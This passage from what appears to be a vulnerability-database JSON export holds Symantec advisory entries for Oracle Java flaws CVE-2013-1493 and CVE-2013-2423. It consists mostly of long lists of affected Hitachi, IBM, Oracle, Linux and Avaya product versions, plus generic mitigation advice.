for Plug-in \n * Hitachi uCosminexus Developer 01 \n * Hitachi uCosminexus Developer Light 06-70 (Windows) \n * Hitachi uCosminexus Developer Light 06-70-/A (Windows) \n * Hitachi uCosminexus Developer Light 06-70-/B (Windows) \n * Hitachi uCosminexus Developer Light 06-70-/C (Windows) \n * Hitachi uCosminexus Developer Light 06-70-/D (Windows) \n * Hitachi uCosminexus Developer Light 06-70-/F (Windows) \n * Hitachi uCosminexus Developer Light 06-70-/G (Windows) \n * Hitachi uCosminexus Developer Light 06-71 (Windows) \n * Hitachi uCosminexus Developer Light 06-71-/A (Windows) \n * Hitachi uCosminexus Developer Light 06-71-/B (Windows) \n * Hitachi uCosminexus Developer Light 06-71-/C (Windows) \n * Hitachi uCosminexus Developer Light 06-71-/D (Windows) \n * Hitachi uCosminexus Developer Light 06-71-/F (Windows) \n * Hitachi uCosminexus Developer Light 06-71-/G (Windows) \n * Hitachi uCosminexus Developer Light 06-71-/H (Windows) \n * Hitachi uCosminexus Developer Light 06-71-/J (Windows) \n * Hitachi uCosminexus Developer Light 6 \n * Hitachi uCosminexus Developer Light 6.7 \n * Hitachi uCosminexus Developer Light 7 \n * Hitachi uCosminexus Developer Light 8 \n * Hitachi uCosminexus Developer Professional 06-70 (Windows) \n * Hitachi uCosminexus Developer Professional 06-70-/A (Windows) \n * Hitachi uCosminexus Developer Professional 06-70-/B (Windows) \n * Hitachi uCosminexus Developer Professional 06-70-/C (Windows) \n * Hitachi uCosminexus Developer Professional 06-70-/D (Windows) \n * Hitachi uCosminexus Developer Professional 06-70-/F (Windows) \n * Hitachi uCosminexus Developer Professional 06-70-/G (Windows) \n * Hitachi uCosminexus Developer Professional 06-71 (Windows) \n * Hitachi uCosminexus Developer Professional 06-71-/A (Windows) \n * Hitachi uCosminexus Developer Professional 06-71-/B (Windows) \n * Hitachi uCosminexus Developer Professional 06-71-/C (Windows) \n * Hitachi uCosminexus Developer Professional 06-71-/D (Windows) \n * Hitachi uCosminexus Developer Professional 06-71-/F (Windows) \n * Hitachi uCosminexus Developer Professional 06-71-/G (Windows) \n * Hitachi uCosminexus Developer Professional 06-71-/H (Windows) \n * Hitachi uCosminexus Developer Professional 06-71-/J (Windows) \n * Hitachi uCosminexus Developer Professional 08-53 (Windows) \n * Hitachi uCosminexus Developer Professional 09-00(Windows) \n * Hitachi uCosminexus Developer Professional 7 \n * Hitachi uCosminexus Developer Professional 8 \n * Hitachi uCosminexus Developer Professional \n * Hitachi uCosminexus Developer Professional for Plug-in 08-70 (Windows) \n * Hitachi uCosminexus Developer Professional for Plug-in \n * Hitachi uCosminexus Developer Standard 06-70 (Windows) \n * Hitachi uCosminexus Developer Standard 06-70-/A (Windows) \n * Hitachi uCosminexus Developer Standard 06-70-/B (Windows) \n * Hitachi uCosminexus Developer Standard 06-70-/C (Windows) \n * Hitachi uCosminexus Developer Standard 06-70-/D (Windows) \n * Hitachi uCosminexus Developer Standard 06-70-/F (Windows) \n * Hitachi uCosminexus Developer Standard 06-70-/G (Windows) \n * Hitachi uCosminexus Developer Standard 06-71 (Windows) \n * Hitachi uCosminexus Developer Standard 06-71-/A (Windows) \n * Hitachi uCosminexus Developer Standard 06-71-/B (Windows) \n * Hitachi uCosminexus Developer Standard 06-71-/C (Windows) \n * Hitachi uCosminexus Developer Standard 06-71-/D (Windows) \n * Hitachi uCosminexus Developer Standard 06-71-/F (Windows) \n * Hitachi uCosminexus Developer Standard 06-71-/G (Windows) \n * Hitachi uCosminexus Developer Standard 06-71-/H (Windows) \n * Hitachi uCosminexus Developer Standard 06-71-/J (Windows) \n * Hitachi uCosminexus Developer Standard 08-53 (Windows) \n * Hitachi uCosminexus Developer Standard 7 \n * Hitachi uCosminexus Developer Standard 8 \n * Hitachi uCosminexus Developer Standard \n * Hitachi uCosminexus Operator 07-00 (Windows) \n * Hitachi uCosminexus Operator 07-00-03 (AIX) \n * Hitachi uCosminexus Operator 07-00-03 (Linux) \n * Hitachi uCosminexus Operator 07-00-03 (Windows) \n * Hitachi uCosminexus Operator 07-10 (Windows) \n * Hitachi uCosminexus Operator 07-10-01 (Windows) \n * Hitachi uCosminexus Operator 07-20 (Windows) \n * Hitachi uCosminexus Operator 07-20-01 (Windows) \n * Hitachi uCosminexus Operator 07-50 (Windows) \n * Hitachi uCosminexus Operator 07-50-01 (Windows) \n * Hitachi uCosminexus Operator 7 \n * Hitachi uCosminexus Operator 8 \n * Hitachi uCosminexus Primary Server Base \n * Hitachi uCosminexus Service Architect 07-00 (Windows) \n * Hitachi uCosminexus Service Architect 07-00-03 (AIX) \n * Hitachi uCosminexus Service Architect 07-00-03 (Linux) \n * Hitachi uCosminexus Service Architect 07-00-03 (Windows) \n * Hitachi uCosminexus Service Architect 07-10 (Windows) \n * Hitachi uCosminexus Service Architect 07-10-01 (Windows) \n * Hitachi uCosminexus Service Architect 07-20 (Windows) \n * Hitachi uCosminexus Service Architect 07-20-01 (Windows) \n * Hitachi uCosminexus Service Architect 07-50 (Windows) \n * Hitachi uCosminexus Service Architect 07-50-01 (Windows) \n * Hitachi uCosminexus Service Architect 08-53 (Windows) \n * Hitachi uCosminexus Service Architect 09-00 \n * Hitachi uCosminexus Service Architect 7 \n * Hitachi uCosminexus Service Architect 8 \n * Hitachi uCosminexus Service Platform - Messaging \n * Hitachi uCosminexus Service Platform 07-00 (Linux) \n * Hitachi uCosminexus Service Platform 07-00 (Windows) \n * Hitachi uCosminexus Service Platform 07-00-03 (AIX) \n * Hitachi uCosminexus Service Platform 07-00-03 (Linux) \n * Hitachi uCosminexus Service Platform 07-00-03 (Windows) \n * Hitachi uCosminexus Service Platform 07-00-12 (Linux) \n * Hitachi uCosminexus Service Platform 07-10 (AIX) \n * Hitachi uCosminexus Service Platform 07-10 (Linux(IPF)) \n * Hitachi uCosminexus Service Platform 07-10 (Linux) \n * Hitachi uCosminexus Service Platform 07-10 (Windows) \n * Hitachi uCosminexus Service Platform 07-10-01 (Linux(IPF)) \n * Hitachi uCosminexus Service Platform 07-10-01 (Windows) \n * Hitachi uCosminexus Service Platform 07-10-06 (AIX) \n * Hitachi uCosminexus Service Platform 07-10-06 (Linux) \n * Hitachi uCosminexus Service Platform 07-20 (Windows) \n * Hitachi uCosminexus Service Platform 07-20-01 (Windows) \n * Hitachi uCosminexus Service Platform 07-50 (Linux) \n * Hitachi uCosminexus Service Platform 07-50 (Windows) \n * Hitachi uCosminexus Service Platform 07-50-01 (Windows) \n * Hitachi uCosminexus Service Platform 08-50 (AIX) \n * Hitachi uCosminexus Service Platform 08-50 (HP-UX(IPF)) \n * Hitachi uCosminexus Service Platform 08-50 (Linux(IPF)) \n * Hitachi uCosminexus Service Platform 08-53 (Linux) \n * Hitachi uCosminexus Service Platform 08-53 (Windows) \n * Hitachi uCosminexus Service Platform 09-00 (Windows) \n * Hitachi uCosminexus Service Platform 09-00 AIX (64) \n * Hitachi uCosminexus Service Platform 09-00 HP-UX (IPF) \n * Hitachi uCosminexus Service Platform 09-00 Linux (x64) \n * Hitachi uCosminexus Service Platform 09-00 Windows (x64) \n * IBM Java SDK 1.4.2 \n * IBM Java SDK 5 \n * IBM Java SDK 6 \n * IBM Java SDK 7 \n * IBM Lotus Domino 8.0 \n * IBM Lotus Domino 8.0.1 \n * IBM Lotus Domino 8.0.2 \n * IBM Lotus Domino 8.5 \n * IBM Lotus Domino 8.5.1 \n * IBM Lotus Domino 8.5.2 \n * IBM Lotus Domino 8.5.3 \n * IBM Lotus Notes 8.0.0 \n * IBM Lotus Notes 8.0.1 \n * IBM Lotus Notes 8.0.2 \n * IBM Lotus Notes 8.5 \n * IBM Lotus Notes 8.5.1 \n * IBM Lotus Notes 8.5.2 \n * IBM Lotus Notes 8.5.3 \n * IBM Lotus Notes 9.0 \n * IBM Maximo Asset Management 6.2 \n * IBM Maximo Asset Management 7.1 \n * IBM Maximo Asset Management 7.5 \n * IBM Maximo Asset Management Essentials 7.1 \n * IBM Maximo Asset Management Essentials 7.5 \n * IBM Rational Functional Tester 8.0.0.1 \n * IBM Rational Functional Tester 8.0.0.2 \n * IBM Rational Functional Tester 8.0.0.3 \n * IBM Rational Functional Tester 8.0.0.4 \n * IBM Rational Functional Tester 8.1 \n * IBM Rational Functional Tester 8.1.0.1 \n * IBM Rational Functional Tester 8.1.0.2 \n * IBM Rational Functional Tester 8.1.0.3 \n * IBM Rational Functional Tester 8.1.1 \n * IBM Rational Functional Tester 8.1.1.1 \n * IBM Rational Functional Tester 8.1.1.2 \n * IBM Rational Functional Tester 8.1.1.3 \n * IBM Rational Functional Tester 8.2 \n * IBM Rational Functional Tester 8.2.0.2 \n * IBM Rational Functional Tester 8.2.1.1 \n * IBM Rational Functional Tester 8.2.2 \n * IBM Rational Functional Tester 8.2.2.1 \n * IBM Rational Functional Tester 8.3 \n * IBM Rational Functional Tester 8.3.0.1 \n * IBM Rational Functional Tester 8.5.0.1 \n * IBM Rational Host On-Demand 11.0.0 \n * IBM Rational Host On-Demand 11.0.7 \n * IBM Service Delivery Manager 7.2.1 \n * IBM Service Delivery Manager 7.2.2 \n * IBM Service Delivery Manager 7.2.4 \n * IBM Smart Analytics System 5600 9.7 \n * IBM Tivoli Application Dependency Discovery Manager 7.2.0 \n * IBM Tivoli Application Dependency Discovery Manager 7.2.1 \n * IBM Tivoli Application Dependency Discovery Manager 7.2.1.1 \n * IBM Tivoli Application Dependency Discovery Manager 7.2.1.2 \n * IBM Tivoli Application Dependency Discovery Manager 7.2.1.3 \n * IBM Tivoli Application Dependency Discovery Manager 7.2.1.4 \n * IBM Tivoli Business Service Manager 4.2 \n * IBM Tivoli Business Service Manager 4.2.1 \n * IBM Tivoli Business Service Manager 6.1 \n * IBM Tivoli Business Service Manager 6.1.1 \n * IBM Tivoli Endpoint Manager for Remote Control 8.2.1 \n * IBM Tivoli Endpoint Manager for Remote Control 9.0.0 \n * IBM Tivoli Netcool/OMNIbus 7.2.1 \n * IBM Tivoli Netcool/OMNIbus 7.3.0 \n * IBM Tivoli Netcool/OMNIbus 7.3.1 \n * IBM Tivoli Netcool/OMNIbus 7.4.0 \n * IBM Tivoli Remote Control 5.1.2 \n * IBM Tivoli System Automation (TSA) for Multiplatforms 3.1 \n * IBM Tivoli System Automation (TSA) for Multiplatforms 3.2 \n * IBM Tivoli System Automation (TSA) for Multiplatforms 3.2.1 \n * IBM Tivoli System Automation (TSA) for Multiplatforms 3.2.2 \n * IBM Tivoli System Automation Application Manager 3.1 \n * IBM Tivoli System Automation Application Manager 3.2 \n * IBM Tivoli System Automation Application Manager 3.2.1 \n * IBM Tivoli System Automation Application Manager 3.2.2 \n * IBM Tivoli System Automation for Integrated Operations Management 2.1 \n * IBM WebSphere ILOG JRules 7.1.1 \n * IBM WebSphere MQ 7.0 \n * IBM WebSphere MQ 7.0.0 2 \n * IBM WebSphere MQ 7.0.0.1 \n * IBM WebSphere MQ 7.0.1 7 \n * IBM WebSphere MQ 7.0.1.1 \n * IBM WebSphere MQ 7.0.1.2 \n * IBM WebSphere MQ 7.0.1.3 \n * IBM WebSphere MQ 7.0.1.4 \n * IBM WebSphere MQ 7.0.1.5 \n * IBM WebSphere MQ 7.0.1.6 \n * IBM WebSphere MQ 7.0.1.8 \n * IBM WebSphere MQ 7.0.1.9 \n * IBM WebSphere MQ 7.1 \n * IBM WebSphere MQ 7.1.0.1 \n * IBM WebSphere MQ 7.1.0.2 \n * IBM WebSphere MQ 7.5 \n * IBM WebSphere MQ 7.5.0.1 \n * IBM WebSphere Message Broker 6.1.0.11 \n * IBM WebSphere Message Broker 7.0.0.5 \n * IBM WebSphere Message Broker 8.0.0.2 \n * IBM WebSphere Operational Decision Management 7.5.0.0 \n * IBM WebSphere Operational Decision Management 8.0.1 \n * Mandriva Business Server 1 \n * Mandriva Business Server 1 X86 64 \n * Mandriva Enterprise Server 5 \n * Mandriva Enterprise Server 5 X86 64 \n * McAfee ePO-MVT 1.0.7 \n * Oracle Enterprise Linux 5 \n * Oracle Enterprise Linux 6 \n * Oracle Enterprise Linux 6.2 \n * Oracle JDK (Linux Production Release) 1.5.0_36 \n * Oracle JDK (Linux Production Release) 1.5.0_38 \n * Oracle JDK (Linux Production Release) 1.5.0_39 \n * Oracle JDK (Linux Production Release) 1.6.0_22 \n * Oracle JDK (Linux Production Release) 1.6.0_23 \n * Oracle JDK (Linux Production Release) 1.6.0_24 \n * Oracle JDK (Linux Production Release) 1.6.0_25 \n * Oracle JDK (Linux Production Release) 1.6.0_26 \n * Oracle JDK (Linux Production Release) 1.6.0_27 \n * Oracle JDK (Linux Production Release) 1.6.0_28 \n * Oracle JDK (Linux Production Release) 1.6.0_30 \n * Oracle JDK (Linux Production Release) 1.6.0_32 \n * Oracle JDK (Linux Production Release) 1.6.0_34 \n * Oracle JDK (Linux Production Release) 1.6.0_35 \n * Oracle JDK (Linux Production Release) 1.6.0_38 \n * Oracle JDK (Linux Production Release) 1.6.0_39 \n * Oracle JDK (Linux Production Release) 1.7.0 \n * Oracle JDK (Linux Production Release) 1.7.0_12 \n * Oracle JDK (Linux Production Release) 1.7.0_13 \n * Oracle JDK (Linux Production Release) 1.7.0_2 \n * Oracle JDK (Linux Production Release) 1.7.0_4 \n * Oracle JDK (Linux Production Release) 1.7.0_7 \n * Oracle JDK (Solaris Production Release) 1.5.0_36 \n * Oracle JDK (Solaris Production Release) 1.5.0_38 \n * Oracle JDK (Solaris Production Release) 1.6.0_22 \n * Oracle JDK (Solaris Production Release) 1.6.0_23 \n * Oracle JDK (Solaris Production Release) 1.6.0_24 \n * Oracle JDK (Solaris Production Release) 1.6.0_25 \n * Oracle JDK (Solaris Production Release) 1.6.0_26 \n * Oracle JDK (Solaris Production Release) 1.6.0_27 \n * Oracle JDK (Solaris Production Release) 1.6.0_28 \n * Oracle JDK (Solaris Production Release) 1.6.0_30 \n * Oracle JDK (Solaris Production Release) 1.6.0_32 \n * Oracle JDK (Solaris Production Release) 1.6.0_34 \n * Oracle JDK (Solaris Production Release) 1.6.0_35 \n * Oracle JDK (Solaris Production Release) 1.6.0_37 \n * Oracle JDK (Solaris Production Release) 1.6.0_38 \n * Oracle JDK (Solaris Production Release) 1.6.0_39 \n * Oracle JDK (Solaris Production Release) 1.7.0 \n * Oracle JDK (Solaris Production Release) 1.7.0_10 \n * Oracle JDK (Solaris Production Release) 1.7.0_11 \n * Oracle JDK (Solaris Production Release) 1.7.0_13 \n * Oracle JDK (Solaris Production Release) 1.7.0_2 \n * Oracle JDK (Solaris Production Release) 1.7.0_4 \n * Oracle JDK (Solaris Production Release) 1.7.0_7 \n * Oracle JDK (Windows Production Release) 1.5.0_36 \n * Oracle JDK (Windows Production Release) 1.5.0_38 \n * Oracle JDK (Windows Production Release) 1.6.0_22 \n * Oracle JDK (Windows Production Release) 1.6.0_23 \n * Oracle JDK (Windows Production Release) 1.6.0_24 \n * Oracle JDK (Windows Production Release) 1.6.0_25 \n * Oracle JDK (Windows Production Release) 1.6.0_26 \n * Oracle JDK (Windows Production Release) 1.6.0_27 \n * Oracle JDK (Windows Production Release) 1.6.0_28 \n * Oracle JDK (Windows Production Release) 1.6.0_30 \n * Oracle JDK (Windows Production Release) 1.6.0_32 \n * Oracle JDK (Windows Production Release) 1.6.0_35 \n * Oracle JDK (Windows Production Release) 1.6.0_37 \n * Oracle JDK (Windows Production Release) 1.6.0_38 \n * Oracle JDK (Windows Production Release) 1.6.0_39 \n * Oracle JDK (Windows Production Release) 1.7.0 \n * Oracle JDK (Windows Production Release) 1.7.0_2 \n * Oracle JDK (Windows Production Release) 1.7.0_4 \n * Oracle JDK (Windows Production Release) 1.7.0_7 \n * Oracle JDK(Linux Production Release) 1.5.0_40 \n * Oracle JDK(Linux Production Release) 1.6.0_37 \n * Oracle JDK(Linux Production Release) 1.6.0_40 \n * Oracle JDK(Linux Production Release) 1.6.0_41 \n * Oracle JDK(Linux Production Release) 1.7.0_10 \n * Oracle JDK(Linux Production Release) 1.7.0_11 \n * Oracle JDK(Linux Production Release) 1.7.0_13 \n * Oracle JDK(Linux Production Release) 1.7.0_14 \n * Oracle JDK(Linux Production Release) 1.7.0_15 \n * Oracle JDK(Linux Production Release) 1.7.0_8 \n * Oracle JDK(Linux Production Release) 1.7.0_9 \n * Oracle JDK(Solaris Production Release) 1.5.0_39 \n * Oracle JDK(Solaris Production Release) 1.5.0_40 \n * Oracle JDK(Solaris Production Release) 1.6.0_39 \n * Oracle JDK(Solaris Production Release) 1.6.0_40 \n * Oracle JDK(Solaris Production Release) 1.6.0_41 \n * Oracle JDK(Solaris Production Release) 1.7.0_12 \n * Oracle JDK(Solaris Production Release) 1.7.0_13 \n * Oracle JDK(Solaris Production Release) 1.7.0_14 \n * Oracle JDK(Solaris Production Release) 1.7.0_15 \n * Oracle JDK(Solaris Production Release) 1.7.0_8 \n * Oracle JDK(Solaris Production Release) 1.7.0_9 \n * Oracle JDK(Windows Production Release) 1.5.0_39 \n * Oracle JDK(Windows Production Release) 1.5.0_40 \n * Oracle JDK(Windows Production Release) 1.6.0_39 \n * Oracle JDK(Windows Production Release) 1.6.0_40 \n * Oracle JDK(Windows Production Release) 1.6.0_41 \n * Oracle JDK(Windows Production Release) 1.7.0_10 \n * Oracle JDK(Windows Production Release) 1.7.0_11 \n * Oracle JDK(Windows Production Release) 1.7.0_12 \n * Oracle JDK(Windows Production Release) 1.7.0_13 \n * Oracle JDK(Windows Production Release) 1.7.0_14 \n * Oracle JDK(Windows Production Release) 1.7.0_15 \n * Oracle JDK(Windows Production Release) 1.7.0_8 \n * Oracle JDK(Windows Production Release) 1.7.0_9 \n * Oracle JRE (Linux Production Release) 1.5.0_36 \n * Oracle JRE (Linux Production Release) 1.5.0_38 \n * Oracle JRE (Linux Production Release) 1.5.0_39 \n * Oracle JRE (Linux Production Release) 1.6.0_22 \n * Oracle JRE (Linux Production Release) 1.6.0_23 \n * Oracle JRE (Linux Production Release) 1.6.0_24 \n * Oracle JRE (Linux Production Release) 1.6.0_25 \n * Oracle JRE (Linux Production Release) 1.6.0_26 \n * Oracle JRE (Linux Production Release) 1.6.0_27 \n * Oracle JRE (Linux Production Release) 1.6.0_28 \n * Oracle JRE (Linux Production Release) 1.6.0_30 \n * Oracle JRE (Linux Production Release) 1.6.0_32 \n * Oracle JRE (Linux Production Release) 1.6.0_35 \n * Oracle JRE (Linux Production Release) 1.6.0_39 \n * Oracle JRE (Linux Production Release) 1.7.0_12 \n * Oracle JRE (Linux Production Release) 1.7.0_13 \n * Oracle JRE (Linux Production Release) 1.7.0_2 \n * Oracle JRE (Linux Production Release) 1.7.0_4 \n * Oracle JRE (Linux Production Release) 1.7.0_7 \n * Oracle JRE (Solaris Production Release) 1.5.0_36 \n * Oracle JRE (Solaris Production Release) 1.5.0_38 \n * Oracle JRE (Solaris Production Release) 1.6.0_22 \n * Oracle JRE (Solaris Production Release) 1.6.0_23 \n * Oracle JRE (Solaris Production Release) 1.6.0_24 \n * Oracle JRE (Solaris Production Release) 1.6.0_25 \n * Oracle JRE (Solaris Production Release) 1.6.0_26 \n * Oracle JRE (Solaris Production Release) 1.6.0_27 \n * Oracle JRE (Solaris Production Release) 1.6.0_28 \n * Oracle JRE (Solaris Production Release) 1.6.0_30 \n * Oracle JRE (Solaris Production Release) 1.6.0_32 \n * Oracle JRE (Solaris Production Release) 1.6.0_35 \n * Oracle JRE (Solaris Production Release) 1.7.0_2 \n * Oracle JRE (Solaris Production Release) 1.7.0_4 \n * Oracle JRE (Solaris Production Release) 1.7.0_7 \n * Oracle JRE (Windows Production Release) 1.5.0_36 \n * Oracle JRE (Windows Production Release) 1.5.0_38 \n * Oracle JRE (Windows Production Release) 1.6.0_22 \n * Oracle JRE (Windows Production Release) 1.6.0_23 \n * Oracle JRE (Windows Production Release) 1.6.0_24 \n * Oracle JRE (Windows Production Release) 1.6.0_25 \n * Oracle JRE (Windows Production Release) 1.6.0_26 \n * Oracle JRE (Windows Production Release) 1.6.0_27 \n * Oracle JRE (Windows Production Release) 1.6.0_28 \n * Oracle JRE (Windows Production Release) 1.6.0_30 \n * Oracle JRE (Windows Production Release) 1.6.0_32 \n * Oracle JRE (Windows Production Release) 1.6.0_35 \n * Oracle JRE (Windows Production Release) 1.6.0_38 \n * Oracle JRE (Windows Production Release) 1.7.0_2 \n * Oracle JRE (Windows Production Release) 1.7.0_4 \n * Oracle JRE (Windows Production Release) 1.7.0_7 \n * Oracle JRE(Linux Production Release) 1.5.0_40 \n * Oracle JRE(Linux Production Release) 1.6.0_38 \n * Oracle JRE(Linux Production Release) 1.6.0_40 \n * Oracle JRE(Linux Production Release) 1.6.0_41 \n * Oracle JRE(Linux Production Release) 1.7.0_10 \n * Oracle JRE(Linux Production Release) 1.7.0_11 \n * Oracle JRE(Linux Production Release) 1.7.0_13 \n * Oracle JRE(Linux Production Release) 1.7.0_14 \n * Oracle JRE(Linux Production Release) 1.7.0_15 \n * Oracle JRE(Linux Production Release) 1.7.0_8 \n * Oracle JRE(Linux Production Release) 1.7.0_9 \n * Oracle JRE(Solaris Production Release) 1.5.0_39 \n * Oracle JRE(Solaris Production Release) 1.5.0_40 \n * Oracle JRE(Solaris Production Release) 1.6.0_38 \n * Oracle JRE(Solaris Production Release) 1.6.0_39 \n * Oracle JRE(Solaris Production Release) 1.6.0_40 \n * Oracle JRE(Solaris Production Release) 1.6.0_41 \n * Oracle JRE(Solaris Production Release) 1.7.0_10 \n * Oracle JRE(Solaris Production Release) 1.7.0_11 \n * Oracle JRE(Solaris Production Release) 1.7.0_12 \n * Oracle JRE(Solaris Production Release) 1.7.0_13 \n * Oracle JRE(Solaris Production Release) 1.7.0_14 \n * Oracle JRE(Solaris Production Release) 1.7.0_15 \n * Oracle JRE(Solaris Production Release) 1.7.0_8 \n * Oracle JRE(Solaris Production Release) 1.7.0_9 \n * Oracle JRE(Windows Production Release) 1.5.0_39 \n * Oracle JRE(Windows Production Release) 1.5.0_40 \n * Oracle JRE(Windows Production Release) 1.6.0_38 \n * Oracle JRE(Windows Production Release) 1.6.0_39 \n * Oracle JRE(Windows Production Release) 1.6.0_40 \n * Oracle JRE(Windows Production Release) 1.6.0_41 \n * Oracle JRE(Windows Production Release) 1.7.0_10 \n * Oracle JRE(Windows Production Release) 1.7.0_11 \n * Oracle JRE(Windows Production Release) 1.7.0_12 \n * Oracle JRE(Windows Production Release) 1.7.0_13 \n * Oracle JRE(Windows Production Release) 1.7.0_14 \n * Oracle JRE(Windows Production Release) 1.7.0_15 \n * Oracle JRE(Windows Production Release) 1.7.0_8 \n * Oracle JRE(Windows Production Release) 1.7.0_9 \n * Redhat Enterprise Linux 5 Server \n * Redhat Enterprise Linux Desktop 5 Client \n * Redhat Enterprise Linux Desktop 6 \n * Redhat Enterprise Linux Desktop Optional 6 \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux Desktop Supplementary 6 \n * Redhat Enterprise Linux HPC Node 6 \n * Redhat Enterprise Linux HPC Node Optional 6 \n * Redhat Enterprise Linux HPC Node Supplementary 6 \n * Redhat Enterprise Linux Server 6 \n * Redhat Enterprise Linux Server Optional 6 \n * Redhat Enterprise Linux Server Supplementary 6 \n * Redhat Enterprise Linux Supplementary 5 Server \n * Redhat Enterprise Linux Workstation 6 \n * Redhat Enterprise Linux Workstation Optional 6 \n * Redhat Enterprise Linux Workstation Supplementary 6 \n * Redhat Network Satellite (for RHEL 5) 5.5 \n * Redhat Network Satellite (for RHEL 6) 5.5 \n * Schneider-Electric Trio TView Software 3.27.0 \n * SuSE Linux Enterprise Software Development Kit 11 SP2 \n * SuSE SUSE Linux Enterprise 10 SP4 \n * SuSE SUSE Linux Enterprise Java 10 SP4 \n * SuSE SUSE Linux Enterprise Java 11 SP2 \n * SuSE SUSE Linux Enterprise Server 11 SP2 \n * SuSE SUSE Linux Enterprise Server for VMware 11 SP2 \n * SuSE Suse Linux Enterprise Desktop 10 SP4 \n * SuSE Suse Linux Enterprise Desktop 11 SP2 \n * SuSE openSUSE 12.1 \n * Ubuntu Ubuntu Linux 10.04 ARM \n * Ubuntu Ubuntu Linux 10.04 Amd64 \n * Ubuntu Ubuntu Linux 10.04 I386 \n * Ubuntu Ubuntu Linux 10.04 Powerpc \n * Ubuntu Ubuntu Linux 10.04 Sparc \n * Ubuntu Ubuntu Linux 11.10 amd64 \n * Ubuntu Ubuntu Linux 11.10 i386 \n * Ubuntu Ubuntu Linux 12.04 LTS amd64 \n * Ubuntu Ubuntu Linux 12.04 LTS i386 \n * Ubuntu Ubuntu Linux 12.10 amd64 \n * Ubuntu Ubuntu Linux 12.10 i386 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nDisabling the execution of script code in the browser may limit exposure to this and other latent vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the impact of latent vulnerabilities, configure applications to run as a nonadministrative user with minimal access rights.\n\nUpdates are available. Please see the references or vendor advisory for more information. The payloads delivered by the exploit kits are detected by Symantec as 'Trojan.Zbot' and 'Trojan.Horse'.\n", "modified": "2013-02-28T00:00:00", "published": "2013-02-28T00:00:00", "id": "SMNTC-58238", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/58238", "type": "symantec", "title": "Oracle Java SE CVE-2013-1493 Remote Code Execution Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-14T22:43:01", "bulletinFamily": "software", "cvelist": ["CVE-2013-2423", "CVE-2013-1347"], "description": "### Description\n\nOracle Java Runtime Environment is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass sandbox protection and perform unauthorized actions in the context of the application. This vulnerability affects the following supported versions: 7 Update 17 and prior Note: This BID was previously titled 'Oracle Java SE CVE-2013-2423 Remote Java Runtime Environment Vulnerability'. The title and technical details have been changed to better reflect the underlying component affected.\n\n### Technologies Affected\n\n * Avaya Aura Application Enablement Services 5.2 \n * Avaya Aura Application Enablement Services 5.2.1 \n * Avaya Aura Application Enablement Services 5.2.2 \n * Avaya Aura Application Enablement Services 5.2.3 \n * Avaya Aura Application Enablement Services 5.2.4 \n * Avaya Aura Application Enablement Services 6.1 \n * Avaya Aura Application Enablement Services 6.1.1 \n * Avaya Aura Application Enablement Services 6.1.2 \n * Avaya Aura Application Server 5300 SIP Core 2.0 \n * Avaya Aura Application Server 5300 SIP Core 3.0 \n * Avaya Aura Communication Manager 5.2.1 \n * Avaya Aura Conferencing 6.0 Standard \n * Avaya Aura Conferencing 7.0 \n * Avaya Aura Experience Portal 6.0 \n * Avaya Aura Experience Portal 6.0 SP1 \n * Avaya Aura Experience Portal 6.0 SP2 \n * Avaya Aura Experience Portal 6.0.1 \n * Avaya Aura Experience Portal 6.0.2 \n * Avaya Aura Messaging 6.0 \n * Avaya Aura Messaging 6.0.1 \n * Avaya Aura Messaging 6.1 \n * Avaya Aura Messaging 6.1.1 \n * Avaya Aura Messaging 6.2 \n * Avaya Aura Presence Services 6.0 \n * Avaya Aura Presence Services 6.1 \n * Avaya Aura Presence Services 6.1 SP1 \n * Avaya Aura Presence Services 6.1.1 \n * Avaya Aura Presence Services 6.1.2 \n * Avaya Aura SIP Enablement Services 5.2 \n * Avaya Aura SIP Enablement Services 5.2.1 \n * Avaya Aura Session Manager 5.2 \n * Avaya Aura Session Manager 5.2 SP1 \n * Avaya Aura Session Manager 5.2 SP2 \n * Avaya Aura Session Manager 5.2.1 \n * Avaya Aura Session Manager 6.0 \n * Avaya Aura Session Manager 6.0 SP1 \n * Avaya Aura Session Manager 6.0.1 \n * Avaya Aura Session Manager 6.1 \n * Avaya Aura Session Manager 6.1 SP1 \n * Avaya Aura Session Manager 6.1 SP2 \n * Avaya Aura Session Manager 6.1.1 \n * Avaya Aura Session Manager 6.1.2 \n * Avaya Aura Session Manager 6.1.3 \n * Avaya Aura Session Manager 6.1.5 \n * Avaya Aura Session Manager 6.2 \n * Avaya Aura Session Manager 6.2 SP1 \n * Avaya Aura Session Manager 6.2.1 \n * Avaya Aura Session Manager 6.2.2 \n * Avaya Aura Session Manager 6.3 \n * Avaya Aura System Manager 5.2 \n * Avaya Aura System Manager 6.0 \n * Avaya Aura System Manager 6.0 SP1 \n * Avaya Aura System Manager 6.1 \n * Avaya Aura System Manager 6.1 SP1 \n * Avaya Aura System Manager 6.1 SP2 \n * Avaya Aura System Manager 6.1.1 \n * Avaya Aura System Manager 6.1.2 \n * Avaya Aura System Manager 6.1.3 \n * Avaya Aura System Manager 6.1.5 \n * Avaya Aura System Manager 6.2 \n * Avaya Aura System Manager 6.2 SP3 \n * Avaya CMS R16 \n * Avaya CMS R16.3 \n * Avaya CMS r15 \n * Avaya CMS r17 \n * Avaya Communication Server 1000E 6.0 \n * Avaya Communication Server 1000E 7.0 \n * Avaya Communication Server 1000E 7.5 \n * Avaya Communication Server 1000E Signaling Server 6.0 \n * Avaya Communication Server 1000E Signaling Server 7.0 \n * Avaya Communication Server 1000E Signaling Server 7.5 \n * Avaya Communication Server 1000M 6.0 \n * Avaya Communication Server 1000M 7.0 \n * Avaya Communication Server 